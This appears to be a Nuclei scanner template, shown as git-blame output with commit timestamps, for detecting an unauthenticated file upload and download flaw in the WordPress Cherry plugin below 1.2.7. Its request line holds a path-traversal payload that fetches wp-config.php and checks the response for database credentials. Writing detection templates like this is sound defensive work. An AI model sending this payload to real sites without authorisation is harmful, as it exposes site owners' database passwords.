2022-02-15 12:06:09 +00:00
id : cherry-lfi
2022-02-12 18:18:31 +00:00
info :
2022-04-21 21:16:41 +00:00
name : WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
2022-02-12 18:18:31 +00:00
author : dhiyaneshDK
severity : high
2022-04-21 21:16:41 +00:00
description : "WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file."
2022-02-12 18:18:31 +00:00
reference :
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
2022-02-15 11:29:08 +00:00
- https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
2022-04-21 21:16:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score : 8.6
cve-id :
cwe-id : CWE-22
2022-02-15 11:29:08 +00:00
tags : wordpress,wp-plugin,lfi,wp
2022-02-12 18:18:31 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
2022-02-15 11:29:08 +00:00
part : body
2022-02-12 18:18:31 +00:00
words :
- "DB_NAME"
- "DB_PASSWORD"
condition : and
- type : status
status :
- 200
2022-04-21 21:16:41 +00:00
# Enhanced by mp on 2022/04/21